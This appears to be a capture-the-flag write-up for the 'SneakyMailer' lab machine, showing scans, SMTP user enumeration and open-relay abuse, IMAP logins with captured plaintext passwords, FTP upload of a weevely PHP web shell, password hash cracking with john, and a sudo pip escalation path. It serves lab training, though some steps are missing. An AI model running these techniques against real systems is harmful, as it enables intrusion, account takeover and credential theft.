# Nmap 7.80 scan initiated Sun Nov 8 16:50:55 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.10.197 Nmap scan report for 10.10.10.197 Host is up (0.022s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA) | 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA) |_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 80/tcp open http nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.14.2 |_http-title: Did not follow redirect to http://sneakycorp.htb 143/tcp open imap Courier Imapd (released 2018) |_imap-capabilities: THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE THREAD=REFERENCES SORT ENABLE ACL2=UNION UIDPLUS STARTTLS completed ACL CHILDREN UTF8=ACCEPTA0001 NAMESPACE OK QUOTA CAPABILITY | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Subject Alternative Name: email:postmaster@example.com | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Public Key type: rsa | Public Key bits: 3072 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-05-14T17:14:21 | Not valid after: 2021-05-14T17:14:21 | MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308 |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c |_ssl-date: TLS randomness does not represent time 993/tcp open ssl/imap Courier Imapd (released 2018) |_imap-capabilities: THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE THREAD=REFERENCES SORT ENABLE ACL2=UNION UIDPLUS completed ACL CHILDREN UTF8=ACCEPTA0001 AUTH=PLAIN NAMESPACE OK QUOTA CAPABILITY | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Subject Alternative Name: email:postmaster@example.com | Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Public Key type: rsa | Public Key bits: 3072 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-05-14T17:14:21 | Not valid after: 2021-05-14T17:14:21 | MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308 |_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c |_ssl-date: TLS randomness does not represent time 8080/tcp open http nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: nginx/1.14.2 |_http-title: Welcome to nginx! Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Nov 8 16:51:55 2020 -- 1 IP address (1 host up) scanned in 60.40 seconds
We can see there is a redirect from the web server on port 80 to http://sneakycorp.htb,
so let's add this local domain to /etc/hosts:
cells.each do |c| puts c.text if /@sneakymailer.htb/.match?(c) end
1
$ ruby grab_email.rb > emails.txt
If we want to verify all email addresses, we can re-use a
Rubyfu - SMTP Enumeration
script and modify it a bit.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
#!/usr/bin/env ruby
require'socket'
users = File.read('emails.txt').split("\n") found = []
@s = TCPSocket.new('sneakycorp.htb', 25) @banner = @s.recv(1024).chomp users.each do |user| @s.send "VRFY #{user} \n\r", 0 resp = @s.recv(1024).chomp found << user if resp.split[2] == user end @s.close
We can use another script to very available commands:
1 2 3 4 5 6 7 8 9 10
$ nmap --script smtp-commands.nse -pT:25 sneakycorp.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 19:03 CET Nmap scan report for sneakycorp.htb (10.10.10.197) Host is up (0.022s latency).
PORT STATE SERVICE 25/tcp open smtp |_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
There is another script to check for open relay but it doesn't work here
(maybe because the anti-spam test target nmap.scanme.org by default).
1 2 3 4 5 6 7 8 9 10
$ nmap --script smtp-open-relay.nse -p 25 sneakycorp.htb --script-args smtp-open-relay.to=tigernixon@sneakymailer.htb,smtp-open-relay.from=noraj@sneakymailer.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 19:09 CET Nmap scan report for sneakycorp.htb (10.10.10.197) Host is up (0.023s latency).
PORT STATE SERVICE 25/tcp open smtp |_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
Nmap done: 1 IP address (1 host up) scanned in 29.45 seconds
Before going farther I checked we can't read emails from the account we
registered. The HackTricks - IMAP Syntax
was useful for that.
1 2 3 4
$ ncat sneakycorp.htb 143 * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information. A1 LOGIN "noraj@sneakymailer.htb" "password" A1 NO Login failed.
I seems the SMTP server is vulnerable to open relay:
An SMTP server that works as an open relay, is a email server that does not verify if the user is authorised to send email from the specified email address. Therefore, users would be able to send email originating from any third-party email address that they want.
1 2 3 4 5 6 7 8 9 10 11
$ ncat sneakycorp.htb 25 MA220 debian ESMTP Postfix (Debian/GNU) MAIL from:noraj@sneakymailer.htb 250 2.1.0 Ok RCPT to:tigernixon@sneakymailer.htb 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> hello open relay . 250 2.0.0 Ok: queued as 4773E25011
I wrote a script to abuse of SMTP open relay and send a test email to all users:
$ ncat sneakycorp.htb 143 * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information. A1 LOGIN "paulbyrd@sneakymailer.htb" "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht" A1 NO Login failed. ^C
$ ncat sneakycorp.htb 143 * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information. A1 LOGIN "paulbyrd" "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht" * OK [ALERT] Filesystem notification initialization error -- contact your mail administrator (check for configuration errors with the FAM/Gamin library) A1 OK LOGIN Ok. A1 LIST "" * * LIST (\Unmarked \HasChildren) "." "INBOX" * LIST (\HasNoChildren) "." "INBOX.Trash" * LIST (\HasNoChildren) "." "INBOX.Sent" * LIST (\HasNoChildren) "." "INBOX.Deleted Items" * LIST (\HasNoChildren) "." "INBOX.Queue" * LIST (\HasNoChildren) "." "INBOX.Sent Items" * LIST (\HasNoChildren) "." "INBOX.Drafts" A1 OK LIST completed
I tried to connect to the IMAP server with Thunderbird and Kube but it
wasn't working but when I tried with Evolution it worked.
$ ftp sneakycorp.htb Connected to sneakycorp.htb. 220 (vsFTPd 3.0.3) Name (sneakycorp.htb:noraj): developer 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxr-x 8 0 1001 4096 Nov 08 15:39 dev 226 Directory send OK. ftp> ls dev 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 May 26 18:52 css drwxr-xr-x 2 0 0 4096 May 26 18:52 img -rwxr-xr-x 1 0 0 13742 Jun 23 08:44 index.php drwxr-xr-x 3 0 0 4096 May 26 18:52 js drwxr-xr-x 2 0 0 4096 May 26 18:52 pypi drwxr-xr-x 4 0 0 4096 May 26 18:52 scss -rwxr-xr-x 1 0 0 26523 May 26 19:58 team.php drwxr-xr-x 8 0 0 4096 May 26 18:52 vendor 226 Directory send OK.
Before uploadign a PHP web shell, let's craft one:
1 2
$ weevely generate noraj agent.php Generated 'agent.php' with password 'noraj' of 744 byte size.
Then let's uplaod it:
1 2 3 4 5 6 7
ftp> cd dev 250 Directory successfully changed. ftp> put agent.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 744 bytes sent in 6.3e-05 seconds (11.3 Mbytes/s)
Then let's connect to our webshell and use the backdoor_reversetcp module
to get a reverse shell because the webshell is quickly removed from the server:
There are 2 users excluding roto that have a shell: low & developer.
Let's try the dev creds:
1 2 3 4 5
$ su developer Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
id uid=1001(developer) gid=1001(developer) groups=1001(developer)
But the home directory of developer is /var/www/dev.sneakycorp.htb
the flag is not here.
We may look elsewhere.
Elevation of Privilege (EoP): from developer to low#
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
ls -lh /home total 8.0K drwxr-xr-x 8 low low 4.0K Jun 8 03:47 low drwx------ 5 vmail vmail 4.0K May 19 21:10 vmail
ls -lhA /home/low total 40K lrwxrwxrwx 1 root root 9 May 19 21:09 .bash_history -> /dev/null -rw-r--r-- 1 low low 220 May 14 05:46 .bash_logout -rw-r--r-- 1 low low 3.5K May 14 05:46 .bashrc drwxr-xr-x 3 low low 4.0K May 16 03:34 .cache drwx------ 3 low low 4.0K May 14 13:21 .gnupg drwxr-xr-x 3 low low 4.0K May 16 03:37 .local dr-x------ 2 low low 4.0K May 16 03:30 .pip -rw-r--r-- 1 low low 807 May 14 05:46 .profile drwxr-xr-x 2 low low 4.0K Jun 8 03:47 .ssh -rwxr-x--- 1 root low 33 Nov 9 10:36 user.txt drwxr-xr-x 6 low low 4.0K May 16 03:33 venv
We already saw 2 references to pypi, now there is a venv folder own by low
and in /etc/passwd an account named pypi which has a home folder named
/var/www/pypi.sneakycorp.htb.
It seems the EoP will go through venv/pypi.
1 2 3 4 5
ls -lhA /var/www/pypi.sneakycorp.htb total 12K -rw-r--r-- 1 root root 43 May 15 14:29 .htpasswd drwxrwx--- 2 root pypi-pkg 4.0K Nov 9 12:19 packages drwxr-xr-x 6 root pypi 4.0K May 14 18:25 venv
$ haiti '$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/' MD5(APR) [HC: 1600] Apache MD5 [HC: 1600]
1 2 3 4 5 6 7 8 9
$ john hash.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status soufianeelhaoui (pypi) 1g 0:00:00:27 DONE (2020-11-09 21:36) 0.03652g/s 130543p/s 130543c/s 130543C/s souhegan..souderton0 Use the "--show" option to display all of the cracked passwords reliably Session complete
low@sneakymailer:~$ sudo -l sudo: unable to resolve host sneakymailer: Temporary failure in name resolution Matching Defaults entries for low on sneakymailer: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer: (root) NOPASSWD: /usr/bin/pip